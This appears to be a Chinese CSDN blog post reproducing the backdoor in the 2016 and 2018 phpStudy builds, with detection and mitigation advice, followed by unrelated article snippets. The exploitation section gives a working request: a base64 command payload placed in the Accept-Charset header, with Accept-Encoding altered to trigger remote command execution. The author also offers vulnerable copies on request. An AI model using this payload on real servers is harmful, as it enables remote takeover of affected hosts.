PhpStudy后门复现以及检测_ID不重要的博客-程序员秘密_phpstudy 后门检测

技术标签: 漏洞复现  漏洞  复现  

软件说明:   

phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。在“杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果”的文章中,说明了一些网站下载的phpstudy版本中存在后门。数十万安装用户成为肉鸡。

漏洞验证:

存在后门的phpStudy版本为2016和2018版本。在安装的php目录下

存在版本的php文件为:

Php-5.2.17

Php-5.4.45

文件路径为:

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

判断是否存在漏洞:

PHP 5.2.17版本

PHP 5.4.45版本

漏洞利用:

安装完phpStudy后,访问

通过burpsuit抓取数据包,添加payload,这里,需要更改数据包内容

添加:

Accept-Charset: ZWNobyBzeXN0ZW0oJ2lwY29uZmlnJyk7

ZWNobyBzeXN0ZW0oJ2lwY29uZmlnJyk7为所执行命令的base64编码

删除:

Accept-Encoding: gzip, deflate中gzip,后面的空格(如果有空格的话,服务端就不会解析Accept-Charset字段中的base64字符串。去掉空格后,就会向下查找Accept-Charset字符串,并解码base64执行)

Accept-Encoding: gzip,deflate

Base64执行代码

 

放行数据包,可得命令执行的回显信息

 

缓解:

目前,绝大部分的下载站都更新了phpStudy安装包,带有漏洞得版本很难找到,验证方法很简单,也就是dll中的关键字eval.要想避免下载漏洞版本的软件,建议到官网下载,不要在下载站中下载来源不明的软件安装包。另外,网上大部分检测条件为文件hash值检测,也就是检测本地文件完整性。判断恶意hash值的文件。同时,检测本地是否存在可疑的命令执行,如net.exe、net1.exe、del、ipconfig.exe、ping.exe等可疑进程的出现。

注:此文章只用于学习交流!!!

如需带有漏洞版本的软件学习测试,请留言联系!

 

 

 

 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39030256/article/details/102739563

智能推荐

matlab求余数_subtitle_的博客-程序员秘密_matlab取余

matlab求余数给出了两个函数:mod和rem,官方也给出了两者的区别:根据需要选择合适的求余函数,记录一下。

云计算时代,企业IT资产安全运维利器——行云管家堡垒机_suancaiyu66的博客-程序员秘密

为了保障网络和数据不受来自外部和内部用户的入侵和破坏,企业通常通过部署堡垒机来管理企业内部IT资产。但随着云计算逐渐发展成为企业IT架构的基础设施,传统堡垒机很难适应云的变化,已经无法对企业IT资产进行更好更全面的系统运维和安全审计管控。不仅如此,由于传统堡垒机过于关注IT管理者层面的安全管理、权限控制,导致运维工程师在使用时不够简捷方便,大大降低了IT运维效率。由此,在云计算的浪潮下,行...

linux下usb驱动接口中端点介绍_枫_在路上的博客-程序员秘密

端点 USB 通讯的最基本形式是通过一个称为端点的东西。一个USB端点只能向一个方向传输数据(从主机到设备(称为输出端点)或者从设备到主机(称为输入端点))。端点可被看作一个单向的管道。 一个 USB 端点有 4 种不同类型, 分别具有不同的数据传送方式: 控制CONTROL 控制端点被用来控制对 USB 设备的不同部分访问. 通常用作配置设备、获取设备信息、发送命令到设备或获取

Java核心基础第1篇-走进Java世界_普通网友的博客-程序员秘密

一、Java简介1.1 Java概述Java从一开始就以友好的语法、面向对象、内存管理和最棒的跨平台可移植性来吸引程序员。写一次就可以在所有地方执行( write-once/run-anywhere)的特性简直太厉害了。image-202105061122543701.2 Java名称的由来Java是印度尼西亚爪哇岛的英文名称,因盛产咖啡而闻名。Java语言中的许多库类名称,...

apex在windows上的安装_Git-Csdn的博客-程序员秘密

第一天,用官网最下面那个命令不行,https://github.com/NVIDIA/apex/最后直接用这个命令装上了:python setup.py install删除的时候除了要把apex-master删除,C:\Users\Administrator\Anaconda3\envs\slimyolo\Lib\site-packages路径下apex-0.1-py3.6-w...

Overleaf v2 评测_stay_foolish12的博客-程序员秘密

Overleaf v2 评测去年,两个著名的Latex在线编辑器Overleaf和Sharelatex合并了,强强联手,让我们对他们合并之后的新产品充满了期待。最近,他们的新产品发布了!这就是Overleaf v2。现在,你可以访问v2.overleaf.com试用可能是迄今最强大的Latex在线编辑器。如果你以前注册过Overleaf或者Sharelatex,你不需要注册新的...

随便推点

echarts的legend过多显示分页效果_跳跳的小古风的博客-程序员秘密_echarts legend 太多

legend: { itemHeight: 12, //圆点大小 itemWidth: 12, width: "70%", itemGap: 29, type: "scroll",//这句 icon: "circle", top: 5, right: "center", textStyle: { //图例文字的样式 color: "#fff", fontSize: 14 }

js_01JavaScript 简介_不一般的菜瓜的博客-程序员秘密

JavaScript 简介JavaScript 简介JavaScript 简史JavaScript 实现1.ECMAScript2.文档对象模型(DOM)3. 浏览器对象模型(BOM)总结:JavaScript 简介JavaScript 简史JavaScript 名字的由来:布兰登·艾奇计划在1995年2月发布的Netscape Navigator 2 开发LiveScript 的脚本语言——该语言将同时在浏览器和服务器中使用。后来Netscape在与Sun合作之后将其改名为JavaScript。J

前端架构模式:支持前端的后端_普通网友的博客-程序员秘密

英文 |https://medium.com/frontend-at-scale/frontend-architectural-patterns-backend-for-fronten...

Windows上远程访问MySQL数据库_琅琊Team的博客-程序员秘密_mysql windows 远程访问

最近有个项目,多台机器需要共享条码信息,又不想额外写一个程序去进行调度,就想到用远程访问数据库的方式来实现多台机器之间的条码共享。 数据库安装完成后,默认的localhost登录。远程电脑如果要访问肯定是需要添加IP地址的。(代码为Python3) 接下来讲重点,就是主机数据库设置(上面代码可以看出如果把host放到config里面,可以保证每台机的代码都一样) 1.Win+R,打开输入cmd,打开命令行 2.将工作目录切换到My...

HDU2040-亲和数_joeycom2的博客-程序员秘密

题目出自杭电 首先解释何谓亲和数 亲和数是对于两个数来说的。如果两个数a和b,a的所有除本身以外的因数之和等于b,b的所有除本身以外的因数之和等于a,则称a,b是一对亲和数。 思路:对于输入的数A,算出它的所有真约数的和C,若C=B,则A和B是亲和数。反之不是。 上代码#include <stdio.h>int n,m;int sum(int n){ int sum =1,

TIFF图像文件格式详解_smilestone322的博客-程序员秘密

该文转自:http://blog.csdn.net/dcraw/archive/2011/05/24/6443537.aspx 1 什么是TIFF? TIFF是Tagged Image File Format的缩写。在现在的标准中,只有TIFF存在, 其他的提法已经舍弃不用了。做为一种标记语言,TIFF与其他文件格式最大的不同在于除了图像数据,它还可以记录很多图像的其他信息。它记录图像